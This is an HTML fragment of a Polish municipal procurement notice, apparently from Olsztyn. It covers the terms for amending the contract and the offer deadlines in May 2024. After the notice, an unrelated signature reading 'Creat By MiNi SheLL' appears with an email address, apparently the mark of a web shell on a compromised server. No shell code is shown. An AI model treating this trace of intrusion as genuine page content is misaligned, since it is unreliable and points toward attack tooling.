class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień Umowy w stosunku do treści oferty Wykonawcy, które nie są zmianami istotnymi w rozumieniu art. 454 ust. 2 ustawy Prawo zamówień publicznych.<br/>2.	Zamawiający dopuszcza możliwość dokonania zmiany istotnych postanowień Umowy w stosunku do treści oferty Wykonawcy w następujących przypadkach:<br/>1)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, noszących znamiona siły wyższej – uprawniających Strony Umowy do zmiany Umowy w zakresie wymaganym do jej prawidłowej realizacji,<br/>2)	pojawienia się nowych, korzystnych dla Zamawiającego rozwiązań technologicznych, możliwych do wdrożenia zamiennie w stosunku do przewidzianych Umową; w powyższej sytuacji wynagrodzenie Wykonawcy nie może zostać zwiększone,<br/>3)	wystąpienia obiektywnych czynników uniemożliwiających realizację Umowy zgodnie z pierwotnym terminem – uprawniających Strony Umowy do zmiany terminu wykonania Umowy,<br/>4)	wystąpienia (ujawnienia) w trakcie realizacji Umowy okoliczności uzasadniających dokonanie uściśleń/uzupełnień/zmian postanowień umownych korzystnych dla Zamawiającego; w powyższej sytuacji wynagrodzenie Wykonawcy nie zostanie zwiększone,<br/>5)	opóźnienia w dostawie związanego z niezawinioną i niezależną od Wykonawcy niedostępnością danego elementu konstrukcji bądź jej znacznie utrudnioną dostępnością -każdorazowo po wykazaniu przez Wykonawcę zaistnienia podstaw do tego rodzaju zmiany, w szczególności poprzez wykazanie braku dostępności/znacząco utrudnionej dostępności danego elementu konstrukcji, braku możliwości złożenia zamówienia we wcześniejszym terminie, obiektywnej niemożności skorzystania z usług innego producenta,<br/>6)	zmiany spowodowane podjęciem działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególnie zagrażającego życiu lub zdrowiu ludzi,<br/>7)	Zamawiający dopuszcza zmianę wysokości wynagrodzenia Wykonawcy w przypadku zmiany stawki podatku od towarów i usług mocą przepisów prawa powszechnie obowiązującego.<br/>3.	Inicjatorem zmian, o których jest mowa w ust. 2 może być Zamawiający lub Wykonawca poprzez wystąpienie w formie pisemnej lub elektronicznej w okresie obowiązywania Umowy zawierające opis proponowanych zmian oraz ich uzasadnienie.<br/>4.	Strona Umowy występująca o zmianę postanowień Umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których jest mowa w ust. 2.<br/>5.	Warunkiem wprowadzenia zmian zawartej Umowy jest sporządzenie podpisanego przez Strony Umowy protokołu zmiany Umowy określającego przyczyny zmiany oraz potwierdzającego wystąpienie (odpowiednio) co najmniej jednej z okoliczności wymienionych w ust. 2. Protokół zmiany Umowy będzie załącznikiem do aneksu do Umowy.<br/>6.	Wszystkie postanowienia zawarte w ust. 2 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednocześnie zobowiązania do wyrażenia takiej zgody i nie rodzą żadnego roszczenia w stosunku do Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.olsztyn.eu/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-15 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com